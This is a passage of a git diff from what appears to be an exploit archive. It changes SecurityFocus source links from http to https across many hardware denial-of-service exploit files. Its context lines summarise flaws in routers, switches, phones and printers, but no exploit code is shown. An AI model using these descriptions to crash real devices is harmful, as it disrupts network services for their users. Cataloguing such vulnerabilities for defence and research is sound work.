router a SYN-ACK packet. To a lesser degree, the router also encounters difficulties when handling SYN-FIN packets. In both instances, some services provided by the router (telnet, FTP and DHCP) will be denied, however, the device will continue to route network traffic. This issue has also been reproduced with other types of malformed packets. diff --git a/exploits/hardware/dos/21637.c b/exploits/hardware/dos/21637.c index 335654c63..5779abfe7 100644 --- a/exploits/hardware/dos/21637.c +++ b/exploits/hardware/dos/21637.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5292/info +// source: https://www.securityfocus.com/bid/5292/info ZyXEL 642R and Prestige 310 routers have difficulties handling IP packets that are malformed. Reportedly, when ZyXEL routers receive a single specially malformed packet, they stop responding for exactly 30 seconds. diff --git a/exploits/hardware/dos/21655.c b/exploits/hardware/dos/21655.c index 1790b7d7f..18f0e96a5 100644 --- a/exploits/hardware/dos/21655.c +++ b/exploits/hardware/dos/21655.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5328/info +// source: https://www.securityfocus.com/bid/5328/info A problem has been discovered in Cisco IOS and MGX switches that could result in a denial of service, and potential code execution. diff --git a/exploits/hardware/dos/21656.txt b/exploits/hardware/dos/21656.txt index 02df2a58a..cafcdfa5e 100644 --- a/exploits/hardware/dos/21656.txt +++ b/exploits/hardware/dos/21656.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5333/info +source: https://www.securityfocus.com/bid/5333/info The Lucent Access Point series of routers support a web based administrative interface. An error has been reported in the embedded HTTP server. diff --git a/exploits/hardware/dos/21657.txt b/exploits/hardware/dos/21657.txt index 4ceb6066d..6865af545 100644 --- a/exploits/hardware/dos/21657.txt +++ b/exploits/hardware/dos/21657.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5336/info +source: https://www.securityfocus.com/bid/5336/info An issue has been reported with the HP ProCurve 4000M Switch. diff --git a/exploits/hardware/dos/21736.txt b/exploits/hardware/dos/21736.txt index e079ae68f..a1f8ed254 100644 --- a/exploits/hardware/dos/21736.txt +++ b/exploits/hardware/dos/21736.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5550/info +source: https://www.securityfocus.com/bid/5550/info The LR series WAN routers are hardware and firmware solutions manufactured and distributed by LG Electronics. diff --git a/exploits/hardware/dos/21756.txt b/exploits/hardware/dos/21756.txt index 1cd26e2bc..0b1d656b8 100644 --- a/exploits/hardware/dos/21756.txt +++ b/exploits/hardware/dos/21756.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5571/info +source: https://www.securityfocus.com/bid/5571/info A denial of service vulnerability has been reported in the Belkin F5D6130 Wireless Network Access Point. diff --git a/exploits/hardware/dos/21770.c b/exploits/hardware/dos/21770.c index 1bf2538f0..f0b2c83d9 100644 --- a/exploits/hardware/dos/21770.c +++ b/exploits/hardware/dos/21770.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5620/info +// source: https://www.securityfocus.com/bid/5620/info Cisco VPN 3000 series concentrators are prone to a denial of service condition when receiving an overly long username string during authentication from a VPN client. diff --git a/exploits/hardware/dos/21791.txt b/exploits/hardware/dos/21791.txt index c2adcfd86..fef6c21b0 100644 --- a/exploits/hardware/dos/21791.txt +++ b/exploits/hardware/dos/21791.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5703/info +source: https://www.securityfocus.com/bid/5703/info The SSR8000 is a SmartSwitch distributed and maintained by Enterasys. diff --git a/exploits/hardware/dos/21828.txt b/exploits/hardware/dos/21828.txt index 1d8e606ad..26c188c47 100644 --- a/exploits/hardware/dos/21828.txt +++ b/exploits/hardware/dos/21828.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5784/info +source: https://www.securityfocus.com/bid/5784/info When multiple Procurve switches are used interconnected, it is common for an administrator to enable a feature allowing each switch to be viewed through a single interface, accessible via the web. diff --git a/exploits/hardware/dos/21939.txt b/exploits/hardware/dos/21939.txt index e4455a335..52a917267 100644 --- a/exploits/hardware/dos/21939.txt +++ b/exploits/hardware/dos/21939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5962/info +source: https://www.securityfocus.com/bid/5962/info Polycom ViaVideo devices are prone to a denial of service condition upon receipt of numerous incomplete HTTP requests. This may restrict availability of the device for legitimate users. diff --git a/exploits/hardware/dos/21971.txt b/exploits/hardware/dos/21971.txt index 0690c7a80..8bab57871 100644 --- a/exploits/hardware/dos/21971.txt +++ b/exploits/hardware/dos/21971.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6059/info +source: https://www.securityfocus.com/bid/6059/info The Cisco AS5350 Universal Gateway is reported to be prone to a denial of service condition. It is possible to cause this condition by portscanning a vulnerable device. diff --git a/exploits/hardware/dos/21975.txt b/exploits/hardware/dos/21975.txt index 1dcf8b809..a7515d024 100644 --- a/exploits/hardware/dos/21975.txt +++ b/exploits/hardware/dos/21975.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6086/info +source: https://www.securityfocus.com/bid/6086/info Linksys BEFSR41 is vulnerable to a denial of service condition. diff --git a/exploits/hardware/dos/21978.txt b/exploits/hardware/dos/21978.txt index eacc85747..b72fbfc14 100644 --- a/exploits/hardware/dos/21978.txt +++ b/exploits/hardware/dos/21978.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6090/info +source: https://www.securityfocus.com/bid/6090/info A denial of service vulnerability has been reported for several networking devices. diff --git a/exploits/hardware/dos/22060.txt b/exploits/hardware/dos/22060.txt index 071c8e7ae..969c7d37b 100644 --- a/exploits/hardware/dos/22060.txt +++ b/exploits/hardware/dos/22060.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6297/info +source: https://www.securityfocus.com/bid/6297/info It has been reported that the ftpd server, included in the Embedded Real Time Operating System (ERTOS) of 3Com Superstack 3 NBX IP phones, contains a denial of service vulnerability. This issue can be triggered by sending a CEL paramater of excessive length, effectively causing the ftpd server and various VoIP services to no longer respond. diff --git a/exploits/hardware/dos/22062.py b/exploits/hardware/dos/22062.py index 79fb31379..de6c349da 100755 --- a/exploits/hardware/dos/22062.py +++ b/exploits/hardware/dos/22062.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6301/info +source: https://www.securityfocus.com/bid/6301/info Several Linksys Broadband Router devices are prone to a buffer overflow conditions. diff --git a/exploits/hardware/dos/22407.txt b/exploits/hardware/dos/22407.txt index f37fd6b4e..69cc3507d 100644 --- a/exploits/hardware/dos/22407.txt +++ b/exploits/hardware/dos/22407.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7166/info +source: https://www.securityfocus.com/bid/7166/info It has been reported that some ProSafe VPN Firewall devices do not properly handle some types of input. Because of this, a remote user could potentially send malicious input to the device that would result in a crash, and potential denial of service. diff --git a/exploits/hardware/dos/22415.c b/exploits/hardware/dos/22415.c index 93fad67c5..6b7d2570b 100644 --- a/exploits/hardware/dos/22415.c +++ b/exploits/hardware/dos/22415.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7175/info +// source: https://www.securityfocus.com/bid/7175/info vulnerability has been reported in the 3Com SuperStack II RAS 1500 router. The problem occurs when processing network packets containing malicious IP headers. When received, the packet may cause the router to crash. diff --git a/exploits/hardware/dos/22440.c b/exploits/hardware/dos/22440.c index 633a975b0..2b6123ceb 100644 --- a/exploits/hardware/dos/22440.c +++ b/exploits/hardware/dos/22440.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/7219/info +source: https://www.securityfocus.com/bid/7219/info It has been reported that the implementation of the Internet Protocol (IP) in the firmware of the D-Link DI-614+ wireless router is vulnerable to a remotely exploitable denial of service condition. The vulnerability is related to the reassembly of fragmented IP packets and can be triggered by transmission of fragments with malicious size parameters to an affected device. There is existing source code that exploits similar, older vulnerabilities that can be used to successfully exploit this vulnerability. When exploited, the device will reboot instantly. This will result in a denial of service until the device has restarted. */ diff --git a/exploits/hardware/dos/22596.txt b/exploits/hardware/dos/22596.txt index 2bc587c32..50a0ecbfb 100644 --- a/exploits/hardware/dos/22596.txt +++ b/exploits/hardware/dos/22596.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7575/info +source: https://www.securityfocus.com/bid/7575/info It has been reported that a problem with Verilink broadband routers exists in the handling of TFTP packets. Because of this, an attacker could potentially deny service to legitimate users of the network. diff --git a/exploits/hardware/dos/22647.txt b/exploits/hardware/dos/22647.txt index 81e0fdcdf..87f6aac9a 100644 --- a/exploits/hardware/dos/22647.txt +++ b/exploits/hardware/dos/22647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7686/info +source: https://www.securityfocus.com/bid/7686/info D-Link DI-704P has been reported prone to a remote denial of service vulnerability. diff --git a/exploits/hardware/dos/22797.txt b/exploits/hardware/dos/22797.txt index 7a85ba01a..efdf46e9c 100644 --- a/exploits/hardware/dos/22797.txt +++ b/exploits/hardware/dos/22797.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7961/info +source: https://www.securityfocus.com/bid/7961/info It has been reported that Cajun switches do not properly handle traffic to port 4000. Because of this, an attacker may be able to cause the switch to stall for period of time. diff --git a/exploits/hardware/dos/22876.txt b/exploits/hardware/dos/22876.txt index d540aacbd..8722b79c1 100644 --- a/exploits/hardware/dos/22876.txt +++ b/exploits/hardware/dos/22876.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8121/info +source: https://www.securityfocus.com/bid/8121/info A problem in the Canon GP-300 has been reported in the handling of some types of malformed web requests. This issue could result in the denial of service to legitmate users of the print server. diff --git a/exploits/hardware/dos/22947.c b/exploits/hardware/dos/22947.c index bd572725f..1b8eef675 100644 --- a/exploits/hardware/dos/22947.c +++ b/exploits/hardware/dos/22947.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8248/info +// source: https://www.securityfocus.com/bid/8248/info A problem in the 3Com 812 OfficeConnect has been reported that may result in the router becoming unstable. Because of this, an attacker may be able to deny service to legitimate users of the vulnerable router by submitting an excessively long request. @@ -7,7 +7,7 @@ A problem in the 3Com 812 OfficeConnect has been reported that may result in the * PoC DoS exploit for 3Com OfficeConnect DSL Routers. This PoC exploit the * vulnerability documented at: -, +, * discovered by David F. Madrid. * * Successful exploitation of the vulnerability should diff --git a/exploits/hardware/dos/22950.txt b/exploits/hardware/dos/22950.txt index e60420613..fb71409b0 100644 --- a/exploits/hardware/dos/22950.txt +++ b/exploits/hardware/dos/22950.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8252/info +source: https://www.securityfocus.com/bid/8252/info A problem has been reported in the handling of requests of excessive length placed to the service on port 280 by the Xavi X7028r DSL router. This may allow an attacker to crash a vulnerable router. diff --git a/exploits/hardware/dos/22962.pl b/exploits/hardware/dos/22962.pl index 7384bff9b..2aaace751 100755 --- a/exploits/hardware/dos/22962.pl +++ b/exploits/hardware/dos/22962.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8290/info +source: https://www.securityfocus.com/bid/8290/info Cisco Aironet AP1x00 series devices are prone to a denial of service vulnerability upon receipt of a malformed HTTP GET request. Such a request will cause the device to reload. diff --git a/exploits/hardware/dos/22978.txt b/exploits/hardware/dos/22978.txt index 6f49ab339..aa5974d14 100644 --- a/exploits/hardware/dos/22978.txt +++ b/exploits/hardware/dos/22978.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8323/info +source: https://www.securityfocus.com/bid/8323/info It has been reported that under some circumstances, a Cisco appliance running IOS may answer malicious malformed UDP echo packets with replies that contain partial contents from the affected router's memory. diff --git a/exploits/hardware/dos/22983.txt b/exploits/hardware/dos/22983.txt index bd1baf3f9..8e4c523d7 100644 --- a/exploits/hardware/dos/22983.txt +++ b/exploits/hardware/dos/22983.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8336/info +source: https://www.securityfocus.com/bid/8336/info The Compaq Management Agent HTTP server is vulnerable to a format string issue. A remote attacker may be able to exploit this vulnerability in order to execute arbitrary code with Local System privileges. diff --git a/exploits/hardware/dos/22991.txt b/exploits/hardware/dos/22991.txt index 8a27a71bc..d2011abc0 100644 --- a/exploits/hardware/dos/22991.txt +++ b/exploits/hardware/dos/22991.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8355/info +source: https://www.securityfocus.com/bid/8355/info D-Link DI-704P has been reported prone to a remote denial of service vulnerability. diff --git a/exploits/hardware/dos/23087.c b/exploits/hardware/dos/23087.c index a4f641dd1..380432686 100644 --- a/exploits/hardware/dos/23087.c +++ b/exploits/hardware/dos/23087.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8524/info +// source: https://www.securityfocus.com/bid/8524/info An information leakage issue has been discovered in Check Point Firewall-1. Because of this, an attacker may gain sensitive information about network resources. diff --git a/exploits/hardware/dos/23190.pl b/exploits/hardware/dos/23190.pl index 1699cdd7a..0ea4b2aba 100755 --- a/exploits/hardware/dos/23190.pl +++ b/exploits/hardware/dos/23190.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8711/info +source: https://www.securityfocus.com/bid/8711/info A denial of service has been reported in the SMC SMC2404WBR BarricadeT Turbo 11/22 Mbps Wireless Cable/DSL Broadband Router. It is possible to trigger this condition by sending UDP packets randomly to ports 0-65000. diff --git a/exploits/hardware/dos/23394.c b/exploits/hardware/dos/23394.c index ce97ad722..a44421556 100644 --- a/exploits/hardware/dos/23394.c +++ b/exploits/hardware/dos/23394.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9091/info +// source: https://www.securityfocus.com/bid/9091/info A problem has been identified in Thomson Cable Modems when handling long requests on the HTTP port. Because of this, it may be possible for an attacker to deny service to legitimate users of the device. diff --git a/exploits/hardware/dos/23508.txt b/exploits/hardware/dos/23508.txt index 3cefe4c55..230b99037 100644 --- a/exploits/hardware/dos/23508.txt +++ b/exploits/hardware/dos/23508.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9339/info +source: https://www.securityfocus.com/bid/9339/info A problem has been identified in the YaSoft Switch Off software package when handling large packets via the service management port (8000/TCP). This may make it possible for a remote user to deny service to legitimate users of the service. diff --git a/exploits/hardware/dos/23638.pl b/exploits/hardware/dos/23638.pl index 055d3eec1..42015e582 100755 --- a/exploits/hardware/dos/23638.pl +++ b/exploits/hardware/dos/23638.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9562/info +source: https://www.securityfocus.com/bid/9562/info A problem has been identified in the handling of specific types of traffic by Cisco 6000, 6500, and 7600 routers with the MSFC2 device. Because of this, an attacker could potentially crash a vulnerable system. diff --git a/exploits/hardware/dos/23672.txt b/exploits/hardware/dos/23672.txt index bbbc5065b..d56ea3818 100644 --- a/exploits/hardware/dos/23672.txt +++ b/exploits/hardware/dos/23672.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9618/info +source: https://www.securityfocus.com/bid/9618/info Problems in various abilities have been identified in the Red-M Red-Alert network monitors. Because of this issues, an attacker may be able to crash a vulnerable device and eliminate logs, gain unauthorized access to the administrative interface, or partially evade detection by an affected device. diff --git a/exploits/hardware/dos/23778.c b/exploits/hardware/dos/23778.c index a0935a487..89890ca29 100644 --- a/exploits/hardware/dos/23778.c +++ b/exploits/hardware/dos/23778.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9779/info +// source: https://www.securityfocus.com/bid/9779/info The Motorola T720 has been reported prone to a remote denial of service vulnerability. The issue presents itself when the phone handles excessive IP based traffic under certain circumstances. diff --git a/exploits/hardware/dos/23786.c b/exploits/hardware/dos/23786.c index c1ff273b6..768e97d57 100644 --- a/exploits/hardware/dos/23786.c +++ b/exploits/hardware/dos/23786.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9787/info +// source: https://www.securityfocus.com/bid/9787/info Nortel Wireless LAN Access Point 2200 series appliances have been reported to be prone to a remote denial of service vulnerability. The issue is reported to present itself when a large network request is handled by one of the Wireless LAN Access Point default administration services. This will reportedly cause the Access Point Appliance Operating service to crash, effectively denying service to legitimate users. diff --git a/exploits/hardware/dos/23788.pl b/exploits/hardware/dos/23788.pl index be3c96f69..07f23df91 100755 --- a/exploits/hardware/dos/23788.pl +++ b/exploits/hardware/dos/23788.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9795/info +source: https://www.securityfocus.com/bid/9795/info An issue in the handling of specific web requests by SureCom network devices has been identified. By placing a malformed request to the web configuration interface, it is possible for an attacker to deny service to legitimate users of a vulnerable device. diff --git a/exploits/hardware/dos/23789.c b/exploits/hardware/dos/23789.c index f329b919c..de7544b05 100644 --- a/exploits/hardware/dos/23789.c +++ b/exploits/hardware/dos/23789.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9795/info +// source: https://www.securityfocus.com/bid/9795/info An issue in the handling of specific web requests by SureCom network devices has been identified. By placing a malformed request to the web configuration interface, it is possible for an attacker to deny service to legitimate users of a vulnerable device. diff --git a/exploits/hardware/dos/23876.txt b/exploits/hardware/dos/23876.txt index 94e9f81fa..3adfa2922 100644 --- a/exploits/hardware/dos/23876.txt +++ b/exploits/hardware/dos/23876.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9969/info +source: https://www.securityfocus.com/bid/9969/info It has been reported that Picophone is prone to a remote buffer overflow vulnerability. This issue is due to the application failing to verify the size of user input before storing it in a finite buffer. diff --git a/exploits/hardware/dos/23900.txt b/exploits/hardware/dos/23900.txt index d042f8fd0..669d067f7 100644 --- a/exploits/hardware/dos/23900.txt +++ b/exploits/hardware/dos/23900.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10021/info +source: https://www.securityfocus.com/bid/10021/info It has been reported that cdp may be prone to a buffer overflow vulnerability that may allow an attacker to cause a denial of service condition in the software. The issue exists due to insufficient boundary checks performed by the printTOC() function. The buffer overflow condition may occur if when a song with a track name exceeding 200 bytes is accessed via the application. diff --git a/exploits/hardware/dos/24143.c b/exploits/hardware/dos/24143.c index 924903603..ce70ae414 100644 --- a/exploits/hardware/dos/24143.c +++ b/exploits/hardware/dos/24143.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10411/info +// source: https://www.securityfocus.com/bid/10411/info It has been reported that the VocalTec VGW120 and VGW480 Telephony Gateways are prone to a remote denial of service vulnerability. The issue is reported to exist in the ASN.1/H.323/H.225 stack. diff --git a/exploits/hardware/dos/24344.txt b/exploits/hardware/dos/24344.txt index faf6777d1..8428dc725 100644 --- a/exploits/hardware/dos/24344.txt +++ b/exploits/hardware/dos/24344.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10840/info +source: https://www.securityfocus.com/bid/10840/info The USR808054 wireless access point is reported to contain a denial of service vulnerability in its embedded web server. diff --git a/exploits/hardware/dos/24839.c b/exploits/hardware/dos/24839.c index dc1e69bee..8be148132 100644 --- a/exploits/hardware/dos/24839.c +++ b/exploits/hardware/dos/24839.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11932/info +// source: https://www.securityfocus.com/bid/11932/info It is reported that Ricoh 450/455 printers are susceptible to a remote denial of service vulnerability. This issue is due to a failure of the device to properly handle exceptional ICMP packets. diff --git a/exploits/hardware/dos/25082.txt b/exploits/hardware/dos/25082.txt index 64fb08648..46a3d3216 100644 --- a/exploits/hardware/dos/25082.txt +++ b/exploits/hardware/dos/25082.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12443/info +source: https://www.securityfocus.com/bid/12443/info Linksys PSUS4 PrintServer is reported prone to a remote denial of service vulnerability while handling certain HTTP POST requests received on TCP port 80. diff --git a/exploits/hardware/dos/25107.txt b/exploits/hardware/dos/25107.txt index 1c05b5af1..30e318687 100644 --- a/exploits/hardware/dos/25107.txt +++ b/exploits/hardware/dos/25107.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12571/info +source: https://www.securityfocus.com/bid/12571/info VPN-1 SecureClient is reported prone to a vulnerability that may allow local attackers to disclose sensitive memory. This can lead to various other attacks against a vulnerable computer. The vulnerability exists in the 'SR_Service.exe', which manages VPN connections. diff --git a/exploits/hardware/dos/25124.txt b/exploits/hardware/dos/25124.txt index 1e6eae3bc..f04b791b4 100644 --- a/exploits/hardware/dos/25124.txt +++ b/exploits/hardware/dos/25124.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12595/info +source: https://www.securityfocus.com/bid/12595/info Thomson TCW690 cable modem is reported prone to multiple remote vulnerabilities. These issues may allow an attacker to cause a denial of service condition and/or gain unauthorized access to the device. diff --git a/exploits/hardware/dos/25277.txt b/exploits/hardware/dos/25277.txt index 3fff40348..ae5bf81b1 100644 --- a/exploits/hardware/dos/25277.txt +++ b/exploits/hardware/dos/25277.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12901/info +source: https://www.securityfocus.com/bid/12901/info Netcomm NB1300 Modem/Router is reported prone to a remote denial of service vulnerability. diff --git a/exploits/hardware/dos/25402.txt b/exploits/hardware/dos/25402.txt index 624189a29..d8dcad7fc 100644 --- a/exploits/hardware/dos/25402.txt +++ b/exploits/hardware/dos/25402.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13154/info +source: https://www.securityfocus.com/bid/13154/info A remote denial of service vulnerability is reported to affect the LG U8120 Mobile Phone. The report indicates that the issue manifests when an affected phone processes a malicious MIDI file. diff --git a/exploits/hardware/dos/25711.txt b/exploits/hardware/dos/25711.txt index d0ada4b6b..be570464c 100644 --- a/exploits/hardware/dos/25711.txt +++ b/exploits/hardware/dos/25711.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13782/info +source: https://www.securityfocus.com/bid/13782/info Sony Ericsson P900 handset is affected by a remote denial of service vulnerability. This issue arises because the application fails to perform boundary checks prior to copying user-supplied data into a finite sized buffer. diff --git a/exploits/hardware/dos/25736.txt b/exploits/hardware/dos/25736.txt index 1449bbf38..8f7018b88 100644 --- a/exploits/hardware/dos/25736.txt +++ b/exploits/hardware/dos/25736.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13784/info +source: https://www.securityfocus.com/bid/13784/info Nokia 9500 handset vCard viewer is affected by a remote denial of service vulnerability. diff --git a/exploits/hardware/dos/25967.txt b/exploits/hardware/dos/25967.txt index a02241d8f..6bcde3a74 100644 --- a/exploits/hardware/dos/25967.txt +++ b/exploits/hardware/dos/25967.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14251/info +source: https://www.securityfocus.com/bid/14251/info The CallManager CTI Manager service is susceptible to a remote denial of service vulnerability. diff --git a/exploits/hardware/dos/26233.txt b/exploits/hardware/dos/26233.txt index 9d1887421..4094e0ba3 100644 --- a/exploits/hardware/dos/26233.txt +++ b/exploits/hardware/dos/26233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14770/info +source: https://www.securityfocus.com/bid/14770/info Cisco IOS Firewall Authentication Proxy is prone to a buffer overflow condition. Successful exploitation of this issue could cause a denial of service or potential execution of arbitrary code. diff --git a/exploits/hardware/dos/26548.pl b/exploits/hardware/dos/26548.pl index b3ad44e58..085c0b95d 100755 --- a/exploits/hardware/dos/26548.pl +++ b/exploits/hardware/dos/26548.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15525/info +source: https://www.securityfocus.com/bid/15525/info Cisco PIX is susceptible to a remote denial-of-service vulnerability when handling certain TCP SYN packets. diff --git a/exploits/hardware/dos/26754.txt b/exploits/hardware/dos/26754.txt index 3be1beeb4..a6a26a89a 100644 --- a/exploits/hardware/dos/26754.txt +++ b/exploits/hardware/dos/26754.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15757/info +source: https://www.securityfocus.com/bid/15757/info VPN-1 SecureClient is reported prone to a policy bypass vulnerability. This issue is due to a failure of the application to securely implement remote administrator-provided policies on affected computers. diff --git a/exploits/hardware/dos/26825.txt b/exploits/hardware/dos/26825.txt index 18a557ee3..551b32a82 100644 --- a/exploits/hardware/dos/26825.txt +++ b/exploits/hardware/dos/26825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15861/info +source: https://www.securityfocus.com/bid/15861/info Multiple Linksys devices are prone to a denial of service vulnerability. diff --git a/exploits/hardware/dos/26833.txt b/exploits/hardware/dos/26833.txt index 59aa029dc..eb90e7e0b 100644 --- a/exploits/hardware/dos/26833.txt +++ b/exploits/hardware/dos/26833.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15864/info +source: https://www.securityfocus.com/bid/15864/info Multiple unspecified Cisco Catalyst switches are prone to a denial of service vulnerability. diff --git a/exploits/hardware/dos/26834.txt b/exploits/hardware/dos/26834.txt index 183b3380d..d0ed0aa37 100644 --- a/exploits/hardware/dos/26834.txt +++ b/exploits/hardware/dos/26834.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15869/info +source: https://www.securityfocus.com/bid/15869/info Westell Versalink 327W is prone to a denial of service vulnerability. diff --git a/exploits/hardware/dos/27232.txt b/exploits/hardware/dos/27232.txt index 145a5c18f..83d938b27 100644 --- a/exploits/hardware/dos/27232.txt +++ b/exploits/hardware/dos/27232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16666/info +source: https://www.securityfocus.com/bid/16666/info Nokia N70 is reportedly prone to a remote denial-of-service vulnerability. diff --git a/exploits/hardware/dos/27241.c b/exploits/hardware/dos/27241.c index 8bdf396fa..2e8212d9c 100644 --- a/exploits/hardware/dos/27241.c +++ b/exploits/hardware/dos/27241.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16690/info +// source: https://www.securityfocus.com/bid/16690/info D-Link DWL-G700AP HTTPD is prone to a remote denial-of-service vulnerability. This issue is due to a failure in the 'httpd' service to properly handle malformed data. diff --git a/exploits/hardware/dos/28228.txt b/exploits/hardware/dos/28228.txt index b8f921dd3..0e64b3a5b 100644 --- a/exploits/hardware/dos/28228.txt +++ b/exploits/hardware/dos/28228.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18996/info +source: https://www.securityfocus.com/bid/18996/info Sunbelt Kerio Personal Firewall is prone to a denial-of-service vulnerability. This issue can occur when a program calls the 'CreateRemoteThread' Windows API call. diff --git a/exploits/hardware/dos/28230.txt b/exploits/hardware/dos/28230.txt index af4b6925c..9acaa6b17 100644 --- a/exploits/hardware/dos/28230.txt +++ b/exploits/hardware/dos/28230.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19006/info +source: https://www.securityfocus.com/bid/19006/info D-Link wired and wireless routers are prone to a buffer-overflow vulnerability because these devices fail to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/hardware/dos/28739.pl b/exploits/hardware/dos/28739.pl index 6bb96a723..7614c3556 100755 --- a/exploits/hardware/dos/28739.pl +++ b/exploits/hardware/dos/28739.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20309/info +source: https://www.securityfocus.com/bid/20309/info Motorola SB4200 is prone to a remote denial-of-service vulnerability. diff --git a/exploits/hardware/dos/29297.py b/exploits/hardware/dos/29297.py index fc6fe522e..0db699094 100755 --- a/exploits/hardware/dos/29297.py +++ b/exploits/hardware/dos/29297.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21666/info +source: https://www.securityfocus.com/bid/21666/info -HP Printers running FTP Print Server are prone to a buffer-overflow vulnerability. This issue occurs because the application fails to boundscheck user-supplied data before copying it into an insufficiently sized buffer. diff --git a/exploits/hardware/dos/29402.txt b/exploits/hardware/dos/29402.txt index 60deb11a9..6ccb32d40 100644 --- a/exploits/hardware/dos/29402.txt +++ b/exploits/hardware/dos/29402.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21933/info +source: https://www.securityfocus.com/bid/21933/info Packeteer PacketShaper is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/hardware/dos/29767.txt b/exploits/hardware/dos/29767.txt index b941c6baa..3bf37633c 100644 --- a/exploits/hardware/dos/29767.txt +++ b/exploits/hardware/dos/29767.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23061/info +source: https://www.securityfocus.com/bid/23061/info Zyxel Routers running the ZynOS operating system are prone to a remote denial-of-service vulnerability. diff --git a/exploits/hardware/dos/30167.txt b/exploits/hardware/dos/30167.txt index ce62588a9..46b439bec 100644 --- a/exploits/hardware/dos/30167.txt +++ b/exploits/hardware/dos/30167.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24388/info +source: https://www.securityfocus.com/bid/24388/info Packeteer PacketShaper is prone to a remote denial-of-service vulnerability because the application's web interface fails to properly handle unexpected requests. diff --git a/exploits/hardware/dos/30506.txt b/exploits/hardware/dos/30506.txt index 2431ef87b..123c85f68 100644 --- a/exploits/hardware/dos/30506.txt +++ b/exploits/hardware/dos/30506.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25352/info +source: https://www.securityfocus.com/bid/25352/info Cisco IOS is prone to a remote denial-of-service vulnerability because the software fails to properly handle certain CLI commands. diff --git a/exploits/hardware/dos/30517.pl b/exploits/hardware/dos/30517.pl index 96eee7670..c43802765 100755 --- a/exploits/hardware/dos/30517.pl +++ b/exploits/hardware/dos/30517.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25399/info +source: https://www.securityfocus.com/bid/25399/info Grandstream GXV-3000 phones are prone to a remote denial-of-service vulnerability. diff --git a/exploits/hardware/dos/30530.pl b/exploits/hardware/dos/30530.pl index 7b00570c5..45ea0ef9d 100755 --- 